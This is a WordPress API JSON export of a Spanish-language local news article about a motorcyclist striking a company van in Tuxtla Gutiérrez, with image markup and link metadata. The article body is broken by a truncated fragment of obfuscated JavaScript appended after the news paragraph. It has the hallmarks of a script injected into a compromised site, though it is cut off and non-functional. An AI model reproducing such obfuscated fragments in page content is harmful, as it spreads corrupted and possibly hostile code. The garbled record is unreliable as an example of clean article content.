{"id":6873,"date":"2022-11-23T01:29:39","date_gmt":"2022-11-23T01:29:39","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=6873"},"modified":"2022-11-23T01:29:40","modified_gmt":"2022-11-23T01:29:40","slug":"urvan-impacta-a-motociclista","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=6873","title":{"rendered":"Urvan impacta a motociclista"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/11\/FB_IMG_1669166903046-1024x576.jpg\" alt=\"\" class=\"wp-image-6874\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/11\/FB_IMG_1669166903046-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/11\/FB_IMG_1669166903046-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/11\/FB_IMG_1669166903046-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/11\/FB_IMG_1669166903046.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.Agencia ReporteCiudadano, 22 de noviembre del 2022. Tuxtla Guti\u00e9rrez.- Un motociclista se impact\u00f3 contra una Urvan cuando circulaba en el Bulevar Fidel Vel\u00e1zquez a la altura de la Avenida R\u00edo Coat\u00e1n de la Colonia 24 de Junio dejando da\u00f1os de consideraci\u00f3n.Este accidente ocurri\u00f3 la ma\u00f1ana de este martes, cuando la Nissan de la empresa Megacable circulaba de Norte a Sur, cuando gir\u00f3 para dar vuelta en U y fue en ese momento que la moto se estrell\u00f3 contra el costado.El joven motociclista dijo que no se percat\u00f3 de la maniobra, y luego de estrellarse sali\u00f3 volando y se impact\u00f3 contra el pavimento.La moto termin\u00f3 con severos da\u00f1os, el conductor con diferentes lesiones.El responsable se hizo cargo de los da\u00f1os mediante un agente de seguros.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho.Agencia ReporteCiudadano, 22 de noviembre del 2022. Tuxtla Guti\u00e9rrez.- Un motociclista se impact\u00f3 contra una Urvan cuando circulaba en el Bulevar Fidel Vel\u00e1zquez a la altura de la Avenida R\u00edo Coat\u00e1n de la Colonia 24 de Junio dejando da\u00f1os de consideraci\u00f3n.Este accidente ocurri\u00f3 la ma\u00f1ana de este martes, cuando la Nissan de la empresa &hellip;<\/p>\n","protected":false},"author":2,"featured_media":6874,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-6873","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/6873","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=6873"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/6873\/revisions"}],"predecessor-version":[{"id":6875,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/6873\/revisions\/6875"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/6874"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=6873"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=6873"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=6873"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}